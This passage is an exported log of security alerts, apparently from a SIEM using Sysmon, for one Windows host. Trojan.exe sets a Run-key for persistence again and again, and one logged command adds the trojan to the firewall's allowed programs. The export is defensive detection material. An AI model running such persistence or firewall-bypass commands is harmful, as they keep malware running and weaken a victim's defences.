..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:08.466728000Z"",""eventRecordID"":""1812"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:08.465\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:08.465"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:11.016",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:07.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:07.436356600Z"",""eventRecordID"":""1811"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:07.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:07.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:09.906",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:06.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:06.414220300Z"",""eventRecordID"":""1810"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:06.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:06.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:09.870",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:05.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:05.389663000Z"",""eventRecordID"":""1808"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:05.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:05.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:08.722",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:04.371 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:04.373879600Z"",""eventRecordID"":""1807"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:04.371\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:04.371"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:08.673",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:03.355 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:03.359442600Z"",""eventRecordID"":""1806"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:03.355\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:03.355"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:07.641",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:02.339 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:02.357161800Z"",""eventRecordID"":""1805"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:02.339\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:02.339"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:04.873",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:00.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:00.212143700Z"",""eventRecordID"":""1803"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:00.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:00.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:04.813",10,"ATT&CK T1090: Netsh","""Process Create: +RuleName: +UtcTime: 2020-05-24 16:25:00.205 +ProcessGuid: {df9fc3d3-9fdc-5eca-0000-0010417a0c00} +ProcessId: 4804 +Image: C:\Windows\SysWOW64\netsh.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Network Command Shell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netsh.exe +CommandLine: netsh firewall add allowedprogram ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ""Trojan.exe"" ENABLE +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-9fb6-5eca-0000-0020f3660300} +LogonId: 0x366F3 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7 +ParentProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ParentProcessId: 6484 +ParentImage: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""","netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:00.211884000Z"",""eventRecordID"":""1802"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-24 16:25:00.205\r\nProcessGuid: {df9fc3d3-9fdc-5eca-0000-0010417a0c00}\r\nProcessId: 4804\r\nImage: C:\\Windows\\SysWOW64\\netsh.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Network Command Shell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netsh.exe\r\nCommandLine: netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-9fb6-5eca-0000-0020f3660300}\r\nLogonId: 0x366F3\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7\r\nParentProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nParentProcessId: 6484\r\nParentImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""utcTime"":""2020-05-24 16:25:00.205"",""processGuid"":""{df9fc3d3-9fdc-5eca-0000-0010417a0c00}"",""processId"":""4804"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\netsh.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Network Command Shell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netsh.exe"",""commandLine"":""netsh firewall add allowedprogram \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" \\\""Trojan.exe\\\"" ENABLE"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-9fb6-5eca-0000-0020f3660300}"",""logonId"":""0x366f3"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7"",""parentProcessGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""parentProcessId"":""6484"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}", +"May 24, 2020 @ 16:24:34.273",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 24, 2020 @ 16:24:24.739",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 24, 2020 @ 16:23:36.689",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 24, 2020 @ 16:23:36.675",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Capabilities' checksum changed. +Old md5sum was: '031a2ac02f3ad0395ebc66e870d3f7a1' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '02327737fea3871d2b8ede52654439d116f38683' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 24, 2020 @ 16:23:23.961",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:10.814 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:10.833661400Z"",""eventRecordID"":""1597"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:10.814\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:10.814"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:22.952",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: 